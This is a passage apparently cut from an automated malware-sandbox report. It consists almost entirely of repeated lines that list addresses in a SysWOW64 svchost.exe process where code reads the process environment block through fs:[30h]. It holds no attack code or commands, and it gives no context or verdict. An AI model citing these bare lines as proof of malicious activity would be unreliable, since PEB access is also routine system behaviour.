            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE10E mov ecx, dword ptr fs:[00000030h]2_2_00BEE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C00115 mov eax, dword ptr fs:[00000030h]2_2_00C00115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B46154 mov eax, dword ptr fs:[00000030h]2_2_00B46154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B46154 mov eax, dword ptr fs:[00000030h]2_2_00B46154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3C156 mov eax, dword ptr fs:[00000030h]2_2_00B3C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD8158 mov eax, dword ptr fs:[00000030h]2_2_00BD8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD4144 mov eax, dword ptr fs:[00000030h]2_2_00BD4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD4144 mov eax, dword ptr fs:[00000030h]2_2_00BD4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD4144 mov ecx, dword ptr fs:[00000030h]2_2_00BD4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD4144 mov eax, dword ptr fs:[00000030h]2_2_00BD4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD4144 mov eax, dword ptr fs:[00000030h]2_2_00BD4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B502A0 mov eax, dword ptr fs:[00000030h]2_2_00B502A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B502A0 mov eax, dword ptr fs:[00000030h]2_2_00B502A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C162D6 mov eax, dword ptr fs:[00000030h]2_2_00C162D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD62A0 mov eax, dword ptr fs:[00000030h]2_2_00BD62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD62A0 mov ecx, dword ptr fs:[00000030h]2_2_00BD62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD62A0 mov eax, dword ptr fs:[00000030h]2_2_00BD62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD62A0 mov eax, dword ptr fs:[00000030h]2_2_00BD62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD62A0 mov eax, dword ptr fs:[00000030h]2_2_00BD62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD62A0 mov eax, dword ptr fs:[00000030h]2_2_00BD62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E284 mov eax, dword ptr fs:[00000030h]2_2_00B7E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E284 mov eax, dword ptr fs:[00000030h]2_2_00B7E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC0283 mov eax, dword ptr fs:[00000030h]2_2_00BC0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC0283 mov eax, dword ptr fs:[00000030h]2_2_00BC0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC0283 mov eax, dword ptr fs:[00000030h]2_2_00BC0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B502E1 mov eax, dword ptr fs:[00000030h]2_2_00B502E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B502E1 mov eax, dword ptr fs:[00000030h]2_2_00B502E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B502E1 mov eax, dword ptr fs:[00000030h]2_2_00B502E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A2C3 mov eax, dword ptr fs:[00000030h]2_2_00B4A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A2C3 mov eax, dword ptr fs:[00000030h]2_2_00B4A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A2C3 mov eax, dword ptr fs:[00000030h]2_2_00B4A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A2C3 mov eax, dword ptr fs:[00000030h]2_2_00B4A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A2C3 mov eax, dword ptr fs:[00000030h]2_2_00B4A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3823B mov eax, dword ptr fs:[00000030h]2_2_00B3823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C1625D mov eax, dword ptr fs:[00000030h]2_2_00C1625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h]2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h]2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h]2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h]2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h]2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h]2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h]2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h]2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h]2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h]2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h]2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BF0274 mov eax, dword ptr fs:[00000030h]2_2_00BF0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B44260 mov eax, dword ptr fs:[00000030h]2_2_00B44260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B44260 mov eax, dword ptr fs:[00000030h]2_2_00B44260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B44260 mov eax, dword ptr fs:[00000030h]2_2_00B44260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3826B mov eax, dword ptr fs:[00000030h]2_2_00B3826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3A250 mov eax, dword ptr fs:[00000030h]2_2_00B3A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B46259 mov eax, dword ptr fs:[00000030h]2_2_00B46259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BFA250 mov eax, dword ptr fs:[00000030h]2_2_00BFA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BFA250 mov eax, dword ptr fs:[00000030h]2_2_00BFA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC8243 mov eax, dword ptr fs:[00000030h]2_2_00BC8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC8243 mov ecx, dword ptr fs:[00000030h]2_2_00BC8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B38397 mov eax, dword ptr fs:[00000030h]2_2_00B38397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B38397 mov eax, dword ptr fs:[00000030h]2_2_00B38397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B38397 mov eax, dword ptr fs:[00000030h]2_2_00B38397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6438F mov eax, dword ptr fs:[00000030h]2_2_00B6438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6438F mov eax, dword ptr fs:[00000030h]2_2_00B6438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3E388 mov eax, dword ptr fs:[00000030h]2_2_00B3E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3E388 mov eax, dword ptr fs:[00000030h]2_2_00B3E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3E388 mov eax, dword ptr fs:[00000030h]2_2_00B3E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5E3F0 mov eax, dword ptr fs:[00000030h]2_2_00B5E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5E3F0 mov eax, dword ptr fs:[00000030h]2_2_00B5E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B5E3F0 mov eax, dword ptr fs:[00000030h]2_2_00B5E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B763FF mov eax, dword ptr fs:[00000030h]2_2_00B763FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h]2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h]2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h]2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h]2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h]2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h]2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h]2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B503E9 mov eax, dword ptr fs:[00000030h]2_2_00B503E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE3DB mov eax, dword ptr fs:[00000030h]2_2_00BEE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE3DB mov eax, dword ptr fs:[00000030h]2_2_00BEE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE3DB mov ecx, dword ptr fs:[00000030h]2_2_00BEE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BEE3DB mov eax, dword ptr fs:[00000030h]2_2_00BEE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE43D4 mov eax, dword ptr fs:[00000030h]2_2_00BE43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE43D4 mov eax, dword ptr fs:[00000030h]2_2_00BE43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BFC3CD mov eax, dword ptr fs:[00000030h]2_2_00BFC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A3C0 mov eax, dword ptr fs:[00000030h]2_2_00B4A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A3C0 mov eax, dword ptr fs:[00000030h]2_2_00B4A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A3C0 mov eax, dword ptr fs:[00000030h]2_2_00B4A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A3C0 mov eax, dword ptr fs:[00000030h]2_2_00B4A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A3C0 mov eax, dword ptr fs:[00000030h]2_2_00B4A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B4A3C0 mov eax, dword ptr fs:[00000030h]2_2_00B4A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B483C0 mov eax, dword ptr fs:[00000030h]2_2_00B483C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B483C0 mov eax, dword ptr fs:[00000030h]2_2_00B483C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B483C0 mov eax, dword ptr fs:[00000030h]2_2_00B483C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B483C0 mov eax, dword ptr fs:[00000030h]2_2_00B483C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC63C0 mov eax, dword ptr fs:[00000030h]2_2_00BC63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C1634F mov eax, dword ptr fs:[00000030h]2_2_00C1634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C0A352 mov eax, dword ptr fs:[00000030h]2_2_00C0A352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3C310 mov ecx, dword ptr fs:[00000030h]2_2_00B3C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B60310 mov ecx, dword ptr fs:[00000030h]2_2_00B60310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A30B mov eax, dword ptr fs:[00000030h]2_2_00B7A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A30B mov eax, dword ptr fs:[00000030h]2_2_00B7A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A30B mov eax, dword ptr fs:[00000030h]2_2_00B7A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE437C mov eax, dword ptr fs:[00000030h]2_2_00BE437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC035C mov eax, dword ptr fs:[00000030h]2_2_00BC035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC035C mov eax, dword ptr fs:[00000030h]2_2_00BC035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC035C mov eax, dword ptr fs:[00000030h]2_2_00BC035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC035C mov ecx, dword ptr fs:[00000030h]2_2_00BC035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC035C mov eax, dword ptr fs:[00000030h]2_2_00BC035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC035C mov eax, dword ptr fs:[00000030h]2_2_00BC035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C18324 mov eax, dword ptr fs:[00000030h]2_2_00C18324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C18324 mov ecx, dword ptr fs:[00000030h]2_2_00C18324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C18324 mov eax, dword ptr fs:[00000030h]2_2_00C18324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C18324 mov eax, dword ptr fs:[00000030h]2_2_00C18324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BE8350 mov ecx, dword ptr fs:[00000030h]2_2_00BE8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC2349 mov eax, dword ptr fs:[00000030h]2_2_00BC2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B744B0 mov ecx, dword ptr fs:[00000030h]2_2_00B744B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCA4B0 mov eax, dword ptr fs:[00000030h]2_2_00BCA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B464AB mov eax, dword ptr fs:[00000030h]2_2_00B464AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BFA49A mov eax, dword ptr fs:[00000030h]2_2_00BFA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B404E5 mov ecx, dword ptr fs:[00000030h]2_2_00B404E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A430 mov eax, dword ptr fs:[00000030h]2_2_00B7A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3E420 mov eax, dword ptr fs:[00000030h]2_2_00B3E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3E420 mov eax, dword ptr fs:[00000030h]2_2_00B3E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3E420 mov eax, dword ptr fs:[00000030h]2_2_00B3E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3C427 mov eax, dword ptr fs:[00000030h]2_2_00B3C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC6420 mov eax, dword ptr fs:[00000030h]2_2_00BC6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B78402 mov eax, dword ptr fs:[00000030h]2_2_00B78402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B78402 mov eax, dword ptr fs:[00000030h]2_2_00B78402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B78402 mov eax, dword ptr fs:[00000030h]2_2_00B78402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6A470 mov eax, dword ptr fs:[00000030h]2_2_00B6A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6A470 mov eax, dword ptr fs:[00000030h]2_2_00B6A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6A470 mov eax, dword ptr fs:[00000030h]2_2_00B6A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BCC460 mov ecx, dword ptr fs:[00000030h]2_2_00BCC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BFA456 mov eax, dword ptr fs:[00000030h]2_2_00BFA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6245A mov eax, dword ptr fs:[00000030h]2_2_00B6245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B3645D mov eax, dword ptr fs:[00000030h]2_2_00B3645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E443 mov eax, dword ptr fs:[00000030h]2_2_00B7E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B645B1 mov eax, dword ptr fs:[00000030h]2_2_00B645B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B645B1 mov eax, dword ptr fs:[00000030h]2_2_00B645B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC05A7 mov eax, dword ptr fs:[00000030h]2_2_00BC05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC05A7 mov eax, dword ptr fs:[00000030h]2_2_00BC05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BC05A7 mov eax, dword ptr fs:[00000030h]2_2_00BC05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E59C mov eax, dword ptr fs:[00000030h]2_2_00B7E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B42582 mov eax, dword ptr fs:[00000030h]2_2_00B42582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B42582 mov ecx, dword ptr fs:[00000030h]2_2_00B42582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B74588 mov eax, dword ptr fs:[00000030h]2_2_00B74588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E5E7 mov eax, dword ptr fs:[00000030h]2_2_00B6E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B425E0 mov eax, dword ptr fs:[00000030h]2_2_00B425E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C5ED mov eax, dword ptr fs:[00000030h]2_2_00B7C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C5ED mov eax, dword ptr fs:[00000030h]2_2_00B7C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B465D0 mov eax, dword ptr fs:[00000030h]2_2_00B465D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A5D0 mov eax, dword ptr fs:[00000030h]2_2_00B7A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7A5D0 mov eax, dword ptr fs:[00000030h]2_2_00B7A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E5CF mov eax, dword ptr fs:[00000030h]2_2_00B7E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7E5CF mov eax, dword ptr fs:[00000030h]2_2_00B7E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50535 mov eax, dword ptr fs:[00000030h]2_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50535 mov eax, dword ptr fs:[00000030h]2_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50535 mov eax, dword ptr fs:[00000030h]2_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50535 mov eax, dword ptr fs:[00000030h]2_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50535 mov eax, dword ptr fs:[00000030h]2_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B50535 mov eax, dword ptr fs:[00000030h]2_2_00B50535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E53E mov eax, dword ptr fs:[00000030h]2_2_00B6E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E53E mov eax, dword ptr fs:[00000030h]2_2_00B6E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E53E mov eax, dword ptr fs:[00000030h]2_2_00B6E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E53E mov eax, dword ptr fs:[00000030h]2_2_00B6E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B6E53E mov eax, dword ptr fs:[00000030h]2_2_00B6E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BD6500 mov eax, dword ptr fs:[00000030h]2_2_00BD6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00C14500 mov eax, dword ptr fs:[00000030h]2_2_00C14500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7656A mov eax, dword ptr fs:[00000030h]2_2_00B7656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7656A mov eax, dword ptr fs:[00000030h]2_2_00B7656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7656A mov eax, dword ptr fs:[00000030h]2_2_00B7656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48550 mov eax, dword ptr fs:[00000030h]2_2_00B48550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B48550 mov eax, dword ptr fs:[00000030h]2_2_00B48550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B766B0 mov eax, dword ptr fs:[00000030h]2_2_00B766B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B7C6A6 mov eax, dword ptr fs:[00000030h]2_2_00B7C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B44690 mov eax, dword ptr fs:[00000030h]2_2_00B44690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B44690 mov eax, dword ptr fs:[00000030h]2_2_00B44690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE6F2 mov eax, dword ptr fs:[00000030h]2_2_00BBE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00BBE6F2 mov eax, dword ptr fs:[00000030h]2_2_00BBE6F2
